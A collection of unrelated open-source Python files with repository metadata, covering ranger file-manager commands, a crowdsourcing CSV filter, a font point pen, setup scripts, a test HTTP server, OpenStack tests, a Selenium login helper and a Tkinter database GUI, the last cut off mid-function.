branches: Iterable[str] = {match.group(0) for match in pat.finditer(stdout)}
commit_SHAs: Set[str] = {line.split(' ')[0] for line in
run(['git', 'log', '--format=oneline'], stdout=PIPE).stdout.decode(
'utf-8').split('\n')}
return (
(" ".join(self.args[:-1]) + " " + cmd)
for cmd in
git.cmds | git.non_i_cmds | git.refs | commit_SHAs | branches | {f'origin/{ref}' for ref in
(git.refs | branches)}
if self.args[-1].startswith(cmd) or cmd.startswith(self.args[-1])
)
class toPDF(Command):
""":toPDF [<file>, ...]
Convert files to PDF.
NOTE requires libreoffice
"""
def execute(self):
d = Path('.')
did_files = []
args = ['libreoffice', '--headless', '--invisible', '--convert-to', 'pdf']
if len(self.args) > 1:
for node in self.args[1:]:
try:
run(args + [node])
did_files.append(node)
except Exception as e:
self.fm.notify(str(e), bad=True)
else:
for ext in ['ppt', 'pptx', 'doc', 'docx']:
for node in d.glob(f'*.{ext}'):
try:
run(args + [node])
did_files.append(node)
except Exception as e:
self.fm.notify(str(e), bad=True)
if len(did_files) == 0:
self.fm.notify('no *.{doc,docx,ppt,pptx} files', bad=True)
else:
self.fm.notify(f'converted {", ".join(did_files)}')
def tab(self, tabnum):
return self._tab_directory_content()
class vim(Command):
""":vim [<option>, ...] [<filename>, ...]
Open marked files in vim.
NOTE marking only works for the current directory.
"""
def execute(self):
cmd = [getenv('EDITOR', 'vim')] + self.args[1:]
if len(self.fm.thistab.get_selection()) > 1:
cmd.append('--')
cmd.extend((i.path for i in self.fm.thistab.get_selection()))
run(cmd, stdout=DEVNULL)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
def tab(self, tabnum):
opts: Set[str] = {'-t',
'+',
'-S',
'--cmd',
'-d',
'-M',
'-m',
'-o',
'-O',
'-p',
'-R'}
if len(self.args) > 1:
if self.args[-1].startswith('-'):
return ((" ".join(self.args[:-1]) + " " + opt).strip()
for opt in opts
if self.args[-1] in opt or opt in self.args[-1])
else:
return ((" ".join(self.args[:-1]) + " " + node).strip()
for node in iglob(join(self.args[-1], '*'))
if self.args[-1] in node or node in self.args[-1])
elif len(self.args) == 1:
return (f"vim {i}" for i in opts)
else:
return None
class lines_of_code(Command):
""":lines_of_code [<extension>]
Counts lines of code recursively from the current directory.
Optionally accepts an extension.
"""
extensions = {
t for t in run(['tokei', '-l'], stderr=DEVNULL, stdout=PIPE).stdout.decode('utf-8').split('\n') if ' ' not in t
}
def execute(self):
return run(['less'],
input=run(['tokei'] if len(self.args) == 1 else ['tokei', '--type', self.args[1]], stdout=PIPE,
stderr=DEVNULL).stdout)
def tab(self, tabnum):
return {
"lines_of_code {0}".format(ext) for ext in lines_of_code.extensions
if self.args[-1].lower() in ext.lower() or ext.lower() in self.args[-1].lower()
}
class grep(Command):
""":grep <string>
Looks for a string in all marked files or directories.
Ripgrep will be attempted before ranger will fallback on git grep and grep.
"""
def execute(self):
if self.rest(1):
# try ripgrep
if exists(expanduser('~/.cargo/bin/rg')):
x = run([
'rg', '--pretty', '--smart-case', '--threads=4',
'--after-context=1', '--before-context=1', '--regexp'
] + self.args[1:],
stdout=PIPE)
# try git grep if in a git repo
elif exists(
run(['git', 'rev-parse', '--show-toplevel'],
PIPE).stdout.decode('utf-8')
):
x = run([
'git', 'grep', '--line-number', '--color=always', '-I',
'--after-context=3', '--threads=4', '--extended-regexp',
'--heading', '--break', '-e'
] + self.args[1:],
stdout=PIPE)
# fallback on grep
else:
x = run([
'grep', '--line-number', '--extended-regexp',
'--color=always', '--with-filename', '-r', '-e'
] + self.args[1:])
if x.stdout:
run(['less', '-R', '-X', '-I'], input=x.stdout)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
else:
self.fm.notify('no matches', bad=True)
def tab(self, tabnum):
for flag in ('--after-context', '--basic-regexp', '--before-context', '--binary-files', '--byte-offset',
'--dereference-recursive', '--exclude-dir', '--exclude-from', '--extended-regexp', '--files-with',
'--files-without', '--fixed-strings', '--ignore-case', '--initial-tab', '--invert-match',
'--line-buffered', '--line-number', '--line-regexp', '--max-count', '--no-filename',
'--no-messages', '--null-data', '--only-matching', '--perl-regexp', '--unix-byte',
'--with-filename', '--word-regexp'):
if self.args[-1] in flag or flag in self.args[-1]:
yield f'{" ".join(self.args[:-1])} {flag}'
class untracked(Command):
""":untracked
List files not tracked by git (ignored).
Same as git --paginate ls-files --others
"""
def execute(self):
run(['git', '--paginate', 'ls-files', '--others'])
class tracked(Command):
""":tracked
List files tracked by git.
Same as git --paginate ls-files
"""
def execute(self):
run(['git', '--paginate', 'ls-files'])
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class mkdir(Command):
""":mkdir [<dirname>, ...]
Creates a directories with given names.
"""
def execute(self):
if not self.args[1:]:
return
for i in self.args[1:]:
dirname = join(self.fm.thisdir.path, expanduser(i))
if not lexists(dirname):
makedirs(dirname, exist_ok=True)
else:
self.fm.notify(f"directory {dirname} exists!", bad=True)
break
def tab(self, tabnum):
return self._tab_directory_content()
class touch(Command):
""":touch [<fname>, ...]
Creates files with given names.
"""
def execute(self):
if not self.args[1:]:
return
for arg in self.args[1:]:
fname = join(self.fm.thisdir.path, expanduser(arg))
if not lexists(fname):
mknod(fname)
else:
self.fm.notify(f"file {fname} exists!", bad=True)
break
def tab(self, tabnum):
return self._tab_directory_content()
class make(Command):
""":make <subcommand>
Run make with specified rule.
NOTE Must have a Makefile in the same directory.
"""
def execute(self):
run(['make'] + self.args[1:], stdout=DEVNULL)
def tab(self, tabnum):
if not isfile('Makefile'):
self.fm.notify('No Makefile in this dir', bad=True)
return
with open('./Makefile', mode='r', encoding='utf-8') as f:
text: str = f.read()
pat = re.compile(r'^(\w+):', flags=re.M)
return (f'make {match.group(1)}' for match in pat.finditer(text))
class modified(Command):
""":modified
List files modified (Git).
Same as git --paginate ls-files --modified
"""
def execute(self):
run(['git', '--paginate', 'ls-files', '--modified'])
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class vimdiff(Command):
""":vimdiff <file1> <file2> | <file1> <file2> <file3>
Open vim in diff mode with passed files.
NOTE when you mark them, only the ones in the current directory's will be passed to vim.
Also, you can diff at most 3 files.
"""
def execute(self):
command = ['vim', '-d', '--']
if len(self.fm.thistab.get_selection()) > 1:
command.extend([i.path
for i in self.fm.thistab.get_selection()][:3])
elif self.args[1:]:
command.extend(self.args[1:4])
else:
return
run(command, stdout=DEVNULL)
self.fm.ui.need_redraw = True
self.fm.ui.redraw_main_column()
class edit(Command):
""":edit [<filename>, ...]
Open file in $EDITOR
"""
def execute(self):
if not self.arg(1):
run([environ['EDITOR'], self.fm.thisfile.path])
else:
run([environ['EDITOR']] + self.args[1:])
def tab(self, tabnum):
return self._tab_directory_content()
|
{
"content_hash": "2e518432343b6135932ca60a9b6f4eac",
"timestamp": "",
"source": "github",
"line_count": 647,
"max_line_length": 119,
"avg_line_length": 31.100463678516228,
"alnum_prop": 0.5002981810953185,
"repo_name": "nl253/Dot-files",
"id": "7185b9688d73d536a354e756aefe7596e7a8a68d",
"size": "20146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": ".config/ranger/commands.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Haskell",
"bytes": "14326"
},
{
"name": "Python",
"bytes": "72736"
},
{
"name": "Shell",
"bytes": "43266"
},
{
"name": "Vim script",
"bytes": "798"
}
],
"symlink_target": ""
}
|
import collections
import csv
import argparse
import sys
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='Remove some items from the task. Removal process is'
'controled by queries/labels files or --prev_task')
parser.add_argument('--queries_file', help='txt file with queries (one per line)')
parser.add_argument('--labels_file',
help='txt file with labels (one per line; 1 - keep, 0 - filter out)')
parser.add_argument('--prev_task', help='csv file with previously judged items',
action='append')
parser.add_argument('--task_csv', help='input csv file', required=True)
parser.add_argument('--spammers',
help='File with ids of malicious workers (one per line)',
action='append')
parser.add_argument('--min_ratings_per_item',
help='Min ratings that item must have in order not to be sent for more ratings',
type=int, default=5)
parser.add_argument('--max_output_items',
help='Max amount of items to output. Used for batching the tasks on CF.',
type=int)
args = parser.parse_args()
if args.prev_task is None and (args.queries_file is None or args.labels_file is None):
print >>sys.stderr, 'Either --prev_task or labels/queries files have to be set'
parser.print_help()
sys.exit(1)
query_filter_labels = None
if args.queries_file is not None and args.labels_file is not None:
with open(args.queries_file) as q_file:
with open(args.labels_file) as l_file:
query_filter_labels = {q.rstrip(): int(l) for (q, l) in zip(q_file, l_file)}
spammers = set()
if args.spammers is not None:
for s_file_name in args.spammers:
with open(s_file_name) as f:
for worker_id in f:
spammers.add(worker_id.rstrip())
judged_items = collections.defaultdict(lambda: 0)
if args.prev_task is not None:
for fname in args.prev_task:
with open(fname) as f:
for row in csv.DictReader(f):
if row['_worker_id'] not in spammers:
judged_items[row['log_id']] += 1
num_judged_distribution = collections.Counter()
with open(args.task_csv) as input:
num = 0
reader = csv.DictReader(input)
writer = csv.DictWriter(sys.stdout, fieldnames=reader.fieldnames)
writer.writeheader()
for row in reader:
if query_filter_labels is not None and query_filter_labels[row['query']] != 1:
continue
num_judged_items = judged_items[row['log_id']]
num_judged_distribution[num_judged_items] += 1
if args.min_ratings_per_item is not None \
and num_judged_items >= args.min_ratings_per_item:
continue
writer.writerow(row)
num += 1
if args.max_output_items is not None and num >= args.max_output_items:
break
print >>sys.stderr, 'Judgements per item stats:', num_judged_distribution
|
{
"content_hash": "539b46c849dcd0c90688c37503b24345",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 92,
"avg_line_length": 43.0958904109589,
"alnum_prop": 0.5982199618563255,
"repo_name": "varepsilon/cas-eval",
"id": "3c17509725f76cc5b5ad64f1b1e2241057562aa2",
"size": "3956",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "logs_processing/filter.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2727"
},
{
"name": "HTML",
"bytes": "44288"
},
{
"name": "JavaScript",
"bytes": "1063"
},
{
"name": "Jupyter Notebook",
"bytes": "44427"
},
{
"name": "Python",
"bytes": "96607"
}
],
"symlink_target": ""
}
|
from typing import Any, Dict, Tuple, Union, Optional
from fontTools.pens.pointPen import AbstractPointPen
from glyphsLib.types import Transform, Point
Number = Union[int, float]
class LayerPointPen(AbstractPointPen):
"""A point pen to draw onto GSLayer object.
See :mod:`fontTools.pens.basePen` and :mod:`fontTools.pens.pointPen` for an
introduction to pens.
"""
def __init__(self, layer: "GSLayer") -> None: # noqa: F821
self._layer: "GSLayer" = layer # noqa: F821
self._path: Optional["GSPath"] = None # noqa: F821
def beginPath(self, **kwargs: Any) -> None:
from glyphsLib.classes import GSPath
if self._path is not None:
raise ValueError("Call endPath first.")
self._path = GSPath()
self._path.closed = True # Until proven otherwise.
def endPath(self) -> None:
if self._path is None:
raise ValueError("Call beginPath first.")
if self._path.closed:
self._path.nodes.append(self._path.nodes.pop(0))
self._layer.paths.append(self._path)
self._path = None
def addPoint(
self,
pt: Tuple[Number, Number],
segmentType: Optional[str] = None,
smooth: bool = False,
name: Optional[str] = None,
userData: Optional[Dict[str, Any]] = None,
**kwargs: Any,
) -> None:
from glyphsLib.classes import GSNode
if self._path is None:
raise ValueError("Call beginPath first.")
if segmentType == "move":
if self._path.nodes:
raise ValueError("For an open contour, 'move' must come first.")
self._path.closed = False
node = GSNode(
Point(*pt),
nodetype=_to_glyphs_node_type(segmentType),
smooth=smooth,
name=name,
)
if userData:
node.userData = userData
self._path.nodes.append(node)
def addComponent(
self,
baseGlyph: str,
transformation: Union[
Transform, Tuple[float, float, float, float, float, float]
],
**kwargs: Any,
) -> None:
from glyphsLib.classes import GSComponent
if not isinstance(transformation, Transform):
transformation = Transform(*transformation)
component = GSComponent(baseGlyph, transform=transformation)
self._layer.components.append(component)
def _to_glyphs_node_type(node_type):
if node_type is None:
return "offcurve"
if node_type == "move":
return "line"
return node_type
def _to_ufo_node_type(node_type):
if node_type not in ["line", "curve", "qcurve"]:
return None
return node_type
|
{
"content_hash": "63ea9a74fa95140e21652a387c449c4b",
"timestamp": "",
"source": "github",
"line_count": 95,
"max_line_length": 80,
"avg_line_length": 28.873684210526317,
"alnum_prop": 0.5931461903025884,
"repo_name": "googlefonts/glyphsLib",
"id": "e00edd5b6f74badbb219d53501440d36f3d23f57",
"size": "2743",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "Lib/glyphsLib/pens.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "998989"
}
],
"symlink_target": ""
}
|
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=[
'herbpy',
],
package_dir={'': 'src'},
)
setup(**d)
|
{
"content_hash": "cb02fa95abef0242c5ac202084eefe31",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 60,
"avg_line_length": 20.7,
"alnum_prop": 0.6570048309178744,
"repo_name": "Shushman/herbpy",
"id": "0632e194bd3a1222a97cbd713499b969144350c4",
"size": "229",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "CMake",
"bytes": "2198"
},
{
"name": "Makefile",
"bytes": "41"
},
{
"name": "Python",
"bytes": "104139"
}
],
"symlink_target": ""
}
|
"""A tiny web server.
This is intended to be used for testing, and
only run from within the
googleclient/native_client
"""
import BaseHTTPServer
import logging
import os
import SimpleHTTPServer
import SocketServer
import sys
logging.getLogger().setLevel(logging.INFO)
# Using 'localhost' means that we only accept connections
# via the loop back interface.
SERVER_PORT = 5103
SERVER_HOST = ''
# We only run from the native_client directory, so that not too much
# is exposed via this HTTP server. Everything in the directory is
# served, so there should never be anything potentially sensitive in
# the serving directory, especially if the machine might be a
# multi-user machine and not all users are trusted. We only serve via
# the loopback interface.
SAFE_DIR_COMPONENTS = ['native_client']
SAFE_DIR_SUFFIX = apply(os.path.join, SAFE_DIR_COMPONENTS)
def SanityCheckDirectory():
if os.getcwd().endswith(SAFE_DIR_SUFFIX):
return
logging.error('httpd.py should only be run from the %s', SAFE_DIR_SUFFIX)
logging.error('directory for testing purposes.')
logging.error('We are currently in %s', os.getcwd())
sys.exit(1)
# the sole purpose of this class is to make the BaseHTTPServer threaded
class ThreadedServer(SocketServer.ThreadingMixIn,
BaseHTTPServer.HTTPServer):
pass
def Run(server_address,
server_class=ThreadedServer,
handler_class=SimpleHTTPServer.SimpleHTTPRequestHandler):
httpd = server_class(server_address, handler_class)
logging.info('started server on port %d', httpd.server_address[1])
httpd.serve_forever()
if __name__ == '__main__':
SanityCheckDirectory()
if len(sys.argv) > 1:
Run((SERVER_HOST, int(sys.argv[1])))
else:
Run((SERVER_HOST, SERVER_PORT))
|
{
"content_hash": "f34af722eb70af3fab0fde12fbe6b16a",
"timestamp": "",
"source": "github",
"line_count": 62,
"max_line_length": 75,
"avg_line_length": 28.43548387096774,
"alnum_prop": 0.735677821894498,
"repo_name": "endlessm/chromium-browser",
"id": "db6cefe138f68ab08095af93c337c67acde1440c",
"size": "1950",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "native_client/tools/httpd.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
import argparse
import timeit
import wandb
def main(size: int) -> None:
run = wandb.init(settings={"console": "off"})
run.log({f"v_{i}": i for i in range(size)})
run.finish()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--size",
type=int,
default=2 * 10**5,
help="size of the logged data",
)
args = parser.parse_args()
start = timeit.default_timer()
main(args.size)
stop = timeit.default_timer()
print("Time: ", stop - start)
|
{
"content_hash": "ddb1cef69de073bc8fd4633ff978a770",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 49,
"avg_line_length": 20.296296296296298,
"alnum_prop": 0.5711678832116789,
"repo_name": "wandb/client",
"id": "6bf5536172464962095cbe0fe72e9cad0887d531",
"size": "548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/standalone_tests/log_large_data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "4902"
},
{
"name": "Dockerfile",
"bytes": "3491"
},
{
"name": "Jupyter Notebook",
"bytes": "7751"
},
{
"name": "Makefile",
"bytes": "1863"
},
{
"name": "Objective-C",
"bytes": "80764"
},
{
"name": "Python",
"bytes": "3634228"
},
{
"name": "Shell",
"bytes": "4662"
}
],
"symlink_target": ""
}
|
"""
This module is meant for vendorizing Python libraries. Most libraries will need
to have some ``sys.path`` alterations done unless they are doing relative
imports.
Do **not** add anything to this module that does not represent a vendorized
library.
Vendored libraries should go into the ``vendor`` directory and imported from
there. This is so we allow libraries that are installed normally to be imported
if the vendored module is not available.
The import dance here is done so that all other imports throught ceph-deploy
are kept the same regardless of where the module comes from.
The expected way to import remoto would look like this::
from ceph_deploy.lib import remoto
"""
try:
# vendored
from .vendor import remoto
except ImportError:
# normally installed
import remoto # noqa
|
{
"content_hash": "d741b5f436675847b3db995d66587068",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 79,
"avg_line_length": 30.25925925925926,
"alnum_prop": 0.7674418604651163,
"repo_name": "ceph/ceph-deploy",
"id": "fefb992e748e75e9bf523f12001f07793fff25bd",
"size": "817",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ceph_deploy/lib/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "395800"
},
{
"name": "Shell",
"bytes": "9231"
}
],
"symlink_target": ""
}
|
class SessionHelper:
def __init__(self, app):
self.app = app
def login(self, username, password):
wd = self.app.wd
self.app.open_home_page()
wd.find_element_by_id("LoginForm").click()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys(username)
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys(password)
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def ensure_logout(self):
if self.is_logged_in():
self.logout()
def is_logged_in(self):
wd = self.app.wd
return len(wd.find_elements_by_link_text("Logout")) > 0
def is_logged_in_as(self, username):
return self.get_logged_username() == username
def get_logged_username(self):
wd = self.app.wd
return wd.find_element_by_xpath("//div/div[1]/form/b").text[1:-1]
def ensure_login(self, username, password):
if self.is_logged_in():
if self.is_logged_in_as(username):
return
else:
self.logout()
self.login(username, password)
|
{
"content_hash": "02d0a4e4f6727e8f391212b6c24f3990",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 76,
"avg_line_length": 32.372093023255815,
"alnum_prop": 0.5747126436781609,
"repo_name": "OlgaKuratkina/python_training_qa",
"id": "b3bc0c015a081998e9b1535f39be0a91622655b5",
"size": "1394",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/session.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "37828"
}
],
"symlink_target": ""
}
|
from .elementfinder import ElementFinder
from .tableelementfinder import TableElementFinder
from .windowmanager import WindowManager
__all__ = [
"ElementFinder",
"TableElementFinder",
"WindowManager"
]
|
{
"content_hash": "132af17a5740979fc995db974f11f91e",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 50,
"avg_line_length": 24.11111111111111,
"alnum_prop": 0.7603686635944701,
"repo_name": "vincentfretin/robotframework-selenium2library",
"id": "7c3f180b8d9a945f1643a0c59930b56fe6e66110",
"size": "217",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Selenium2Library/locators/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "1739"
},
{
"name": "JavaScript",
"bytes": "9719"
},
{
"name": "Python",
"bytes": "247158"
}
],
"symlink_target": ""
}
|
class DynamicObject(object):
def __init__(self, dictionary = {}):
self.__dict__['_dict'] = dictionary
def __setattr__(self, name, value):
d = self.__dict__['_dict']
d[name] = value
def __getattr__(self, name):
d = self.__dict__['_dict']
if name in d:
return d[name]
else:
raise AttributeError(name)
|
{
"content_hash": "ef7b906819d64fb687328d2c1d133a2b",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 43,
"avg_line_length": 22.3,
"alnum_prop": 0.4282511210762332,
"repo_name": "ThomasBollmeier/bovinus",
"id": "29cb2e93215f672065bf76cbb1d3a58eddb9fb40",
"size": "1059",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/runtime/python/util.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "75463"
},
{
"name": "M4",
"bytes": "1643"
},
{
"name": "Makefile",
"bytes": "2791"
},
{
"name": "PHP",
"bytes": "83682"
},
{
"name": "Python",
"bytes": "197313"
},
{
"name": "Shell",
"bytes": "1441"
},
{
"name": "Vim script",
"bytes": "1125"
}
],
"symlink_target": ""
}
|
from tempest.api.compute import base
from tempest import exceptions
from tempest.test import attr
class ServerAddressesV3Test(base.BaseV3ComputeTest):
_interface = 'json'
@classmethod
def setUpClass(cls):
super(ServerAddressesV3Test, cls).setUpClass()
cls.client = cls.servers_client
resp, cls.server = cls.create_test_server(wait_until='ACTIVE')
@attr(type=['negative', 'gate'])
def test_list_server_addresses_invalid_server_id(self):
# List addresses request should fail if server id not in system
self.assertRaises(exceptions.NotFound, self.client.list_addresses,
'999')
@attr(type=['negative', 'gate'])
def test_list_server_addresses_by_network_neg(self):
# List addresses by network should fail if network name not valid
self.assertRaises(exceptions.NotFound,
self.client.list_addresses_by_network,
self.server['id'], 'invalid')
@attr(type='smoke')
def test_list_server_addresses(self):
# All public and private addresses for
# a server should be returned
resp, addresses = self.client.list_addresses(self.server['id'])
self.assertEqual('200', resp['status'])
# We do not know the exact network configuration, but an instance
# should at least have a single public or private address
self.assertTrue(len(addresses) >= 1)
for network_name, network_addresses in addresses.iteritems():
self.assertTrue(len(network_addresses) >= 1)
for address in network_addresses:
self.assertTrue(address['addr'])
self.assertTrue(address['version'])
@attr(type='smoke')
def test_list_server_addresses_by_network(self):
# Providing a network type should filter
# the addresses return by that type
resp, addresses = self.client.list_addresses(self.server['id'])
# Once again we don't know the environment's exact network config,
# but the response for each individual network should be the same
# as the partial result of the full address list
id = self.server['id']
for addr_type in addresses:
resp, addr = self.client.list_addresses_by_network(id, addr_type)
self.assertEqual('200', resp['status'])
addr = addr[addr_type]
for address in addresses[addr_type]:
self.assertTrue(any([a for a in addr if a == address]))
class ServerAddressesV3TestXML(ServerAddressesV3Test):
_interface = 'xml'
|
{
"content_hash": "9068495a8fe4f3e413d1ea43bd7271b1",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 77,
"avg_line_length": 39.1044776119403,
"alnum_prop": 0.6423664122137405,
"repo_name": "adkerr/tempest",
"id": "82588b686bb713e743c65252ba713aa31a7def40",
"size": "3301",
"binary": false,
"copies": "3",
"ref": "refs/heads/netapp/akerr",
"path": "tempest/api/compute/v3/servers/test_server_addresses.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1855736"
},
{
"name": "Shell",
"bytes": "5748"
}
],
"symlink_target": ""
}
|
import simuvex
class UserHook(simuvex.SimProcedure):
NO_RET = True
# pylint: disable=arguments-differ
def run(self, user_func=None, user_kwargs=None, default_return_addr=None, length=None):
result = user_func(self.state, **user_kwargs)
if result is None:
self.add_successor(self.state, default_return_addr, self.state.se.true, 'Ijk_NoHook')
else:
for state in result:
self.add_successor(state, state.ip, state.scratch.guard, state.scratch.jumpkind)
|
{
"content_hash": "5d8d451566f64014e95e48c72c548191",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 97,
"avg_line_length": 40.53846153846154,
"alnum_prop": 0.6584440227703985,
"repo_name": "chubbymaggie/simuvex",
"id": "c1ec1de15f685e145d39864ede5c81c1aefa638f",
"size": "527",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "simuvex/procedures/stubs/UserHook.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "6276"
},
{
"name": "C++",
"bytes": "34210"
},
{
"name": "Makefile",
"bytes": "599"
},
{
"name": "Python",
"bytes": "854125"
}
],
"symlink_target": ""
}
|
"""
Created on Tue Feb 09 16:03:00 2016
@author: JCole119213
"""
#import pdb
import Tkinter as tki
import tkFileDialog
from EmailSamplesDB import EmailSamplesDB
import argparse
import logging
import os
from ProgressWindow import *
class DBBuildGUI(tki.Toplevel) :
def __init__(self, parent, DBobj, *args, **kwargs) :
try :
initdir = kwargs['initialdir']
del kwargs['initialdir']
except :
initdir = os.path.abspath(r'.')
self.DBobj = DBobj
self.parent = parent
tki.Toplevel.__init__(self, parent)
self.transient(parent)
self.title("Build the sample database")
self.result = None
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.cancel)
self.geometry("+%d+%d"%(parent.winfo_rootx()+50,
parent.winfo_rooty()+50))
self.SampleSetDistributionFrame = self.DefineSampleSetDistributionFrame()
self.SampleSetDistributionFrame.grid(row=0,column=0,columnspan=2,pady=10,ipady=3,ipadx=3)
tki.Label(self,text="Enter a directory with legitimate email samples:").grid(row=1,column=0,columnspan=2,sticky=tki.W,padx=5)
self.GoodSamples = tki.Entry(self,width=100)
self.GoodSamples.grid(row=2,column=0,sticky=tki.W,padx=5)
tki.Label(self,text="Enter a directory with spam samples:").grid(row=3,column=0,columnspan=2,sticky=tki.W,padx=5)
self.SpamSamples = tki.Entry(self,width=100)
self.SpamSamples.grid(row=4,column=0,sticky=tki.W,padx=5)
# defining options for opening a directory
self.legitdir_opt = options1 = {}
options1['initialdir'] = initdir
options1['mustexist'] = True
options1['title'] = 'Select a directory with legitimate email examples'
self.BrowseLegit = tki.Button(self,text="Browse",command=self.asklegitdirectory)
self.BrowseLegit.focus_set()
self.BrowseLegit.grid(row=2,column=1,padx=5,pady=5)
self.spamdir_opt = options2 = {}
options2['initialdir'] = initdir
options2['mustexist'] = True
options2['title'] = 'Select a directory with spam examples'
self.BrowseSpam = tki.Button(self,text="Browse",command=self.askspamdirectory)
self.BrowseSpam.grid(row=4,column=1,padx=5,pady=5)
self.ButtonsFrame = self.DefineButtonsFrame()
self.ButtonsFrame.grid(row=5,column=0,columnspan=2,sticky=tki.W+tki.E,pady=20)
self.dbfile_opt = {}
self.dbfile_opt['initialdir'] = initdir
self.dbfile_opt['filetypes'] = [('database files','.sqlite3'),('all files','.*')]
self.bind("<Escape>",self.cancel)
self.wait_window(self)
return
def cancel(self,_=None) :
logging.debug("Shutting down the dialog")
self.result = self.DBobj.DBpath
self.parent.focus_set()
self.destroy()
def DefineSampleSetDistributionFrame(self) :
SampleDistFrame = tki.Frame(self,relief=tki.SUNKEN,borderwidth=3)
tki.Label(SampleDistFrame,text="Set Distribution Targets",font='TkHeadingFont 12').grid(row=0,columnspan=6,padx=30)
tki.Label(SampleDistFrame,text="Training",width=8).grid(row=1,column=0,columnspan=2)
tki.Label(SampleDistFrame,text="Cross Validation",width=16).grid(row=1,column=2,columnspan=2)
tki.Label(SampleDistFrame,text="Test").grid(row=1,column=4,columnspan=2)
self.TrainingPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.TrainingPercentEntry.insert(0,"60")
self.TrainingPercentEntry.grid(row=2,column=0,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=1,sticky=tki.W)
self.CrossValPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.CrossValPercentEntry.insert(0,"20")
self.CrossValPercentEntry.grid(row=2,column=2,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=3,sticky=tki.W)
self.TestPercentEntry = tki.Entry(SampleDistFrame,justify='center',width=5)
self.TestPercentEntry.insert(0,"20")
self.TestPercentEntry.grid(row=2,column=4,sticky=tki.E)
tki.Label(SampleDistFrame,text='%',width=1).grid(row=2,column=5,sticky=tki.W)
tki.Label(SampleDistFrame,text="Current DB Distribution",font='TkHeadingFont 12').grid(row=0,column=6,columnspan=3,padx=30)
tki.Label(SampleDistFrame,text="Training").grid(row=1,column=6)
tki.Label(SampleDistFrame,text="Cross Validation").grid(row=1,column=7)
tki.Label(SampleDistFrame,text="Test").grid(row=1,column=8)
self.DBTrainingPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBTrainingPercent).grid(row=2,column=6)
self.DBCrossValPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBCrossValPercent).grid(row=2,column=7)
self.DBTestPercent = tki.StringVar(SampleDistFrame)
tki.Label(SampleDistFrame,textvariable=self.DBTestPercent).grid(row=2,column=8)
self.UpdateDBDist()
return SampleDistFrame
def UpdateDBDist(self) :
logging.debug("Updating the DB distribution indicator")
if self.DBobj.DBpath is not None :
try :
self.DBobj.ConnectDB(self.DBobj.DBpath)
_,DBDist = self.DBobj.GetSampleDistribution()
SampleCount = self.DBobj.GetSampleCount()
self.DBobj.DisconnectDB()
DBDist = [SetCount/SampleCount*100 for SetCount in DBDist]
except ZeroDivisionError :
DBDist = [0,0,0]
except Exception as detail :
logging.debug("Using default set distribution [0,0,0] due to error: %s"%detail)
DBDist = [0,0,0]
else :
DBDist = [0,0,0]
self.DBTrainingPercent.set("%.1f%%"%DBDist[0])
self.DBCrossValPercent.set("%.1f%%"%DBDist[1])
self.DBTestPercent.set("%.1f%%"%DBDist[2])
return
def GetTargetDBDist(self) :
TargDBDist = [self.TrainingPercentEntry.get(),
self.CrossValPercentEntry.get(),
self.TestPercentEntry.get()]
for ii,val in enumerate(TargDBDist) :
try :
